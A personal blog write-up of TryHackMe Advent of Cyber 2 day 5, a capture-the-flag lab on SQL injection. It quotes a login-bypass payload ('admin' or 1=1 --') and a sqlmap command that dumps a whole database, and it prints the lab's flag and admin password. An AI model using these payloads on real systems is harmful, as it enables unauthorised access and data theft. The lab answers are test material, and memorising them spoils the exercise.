TryHackMe Advent of Cyber 2, day 5, Write up.

Today was rough, and I almost did not even get to log onto TryHackMe, and complete day 5. It seemed like things kept popping up, and needing to be taken care of. Thankfully I was able to complete everything that needed doing, I was able to squeeze in a few minutes and continue my daily write ups for the TryHackMe Advent of Cyber 2.

Today they are teaching us about SQL injection, bypassing logins, how to use it to access database information, blind SQL injection, and a new tool to use called SQLmap! They also showed us how to use BurpSuite in conjunction with SQLmap, which was pretty cool.

After reading the instructions and lessons, I started up the attackbox and the machine we would be using our newfound skills against.

After everything was up and running, I followed the instructions to copy and paste: 10.10.136.69:8000 into the URL location in the Firefox browser window of the attackbox.

This opened a page which welcomed us to “Santa’s Official Form”. There were no login options anywhere I could see, and I tried clicking on everything, but I couldn’t find anything useful on the page.

The first question of the challenge asked what is Santa’s secret login panel? I had no idea, so I kept poking around on the webpage, looking at the page source, nothing jumped out at me. I relented and clicked on the “hint” button, and it told me that the name is derived out of 2 words from this question. I could see that it had a “/” before the answer, so I figured it would have to go into the URL somewhere. I decided to place it after the :8000 port extension. After about 15 minutes of guessing around, I finally landed on 10.10.136.69:8000/santapanel which was correct and brought me to a new page where it had a place to enter a username and password. I tried a bunch of guessing, but nothing worked. I knew I had read something in the instructions where it said something about bypassing a login screen, so I read it all over again. I saw the part where it mentioned “Remember that 1=1 in SQL stands for True” I wrote that down as important. I saw a bit further where it talked about putting ‘ or true — in the username field. I figured this was important as well, so I wrote it down. Noting else jumped out at me for my current problem so I went back and looked at my notes. I could see that by putting the single ‘ it would break the normal functionality of the input box, and the 1=1 is a true statement, which the “or true” portion of the statement would validate, and the — commented out the password checking part, essentially making the application forget to check if the password is true. So putting it all together, I tried admin’ or 1=1 — in the username field, and admin in the password field, and it let me in! I had bypassed the login screen! I was then greeted by a new webpage with a picture of Santa on it and a “welcome back, Santa” message. The page also had a message stating “the database has been updated while you were away!” and an empty input box with the word “Enter:” next to it and a small table with Gift and Child labels.

So looking back at the questions, I was able to bypass the login using SQLi, so I marked complete on that one.

The next question asked, “how many entries are there in the gift database?” Yeah, I had no idea where to find that information…

Back to the instructions again.

I spent the next 30 minutes going over the instructions, seeing that I had to turn on the burp proxy in Firefox, turn on intercept in the BurpSuite tool, and then submit a query on the page I was on, so that BurpSuite could capture it for use with SQLmap.

Ok, so I followed the instructions, turned on the correct tools, intercepted the request, then saved it to my root directory, so I could use it in SQLmap.

Not going to lie, I have never used SQLmap before, and I could not figure out what syntax I needed to use in order to make it do what I wanted it to. It took me re reading the instructions, looking at the “MAN” page for sqlmap, and more trial and error than needed, but I was able to get it formatted correctly in the end. sqlmap -r intercept.request — tamper=space2comment — dump-all — dbms sqlite

This command spit out a ton of information! I was amazed at what it was able to get from the site.

The last 4 questions all had to do with finding information that sqlmap had spit out, so this wasn’t too difficult.

I was able to find how many entries there were in the gift database (22), what Paul asked for (github ownership), the flag for the challenge (thmfox{All_I_Want_for_Christmas_Is_You}), and the admins password (EhCNSWzzFP6sc7gB).

Very nice challenge today TryHackMe, I really enjoyed it.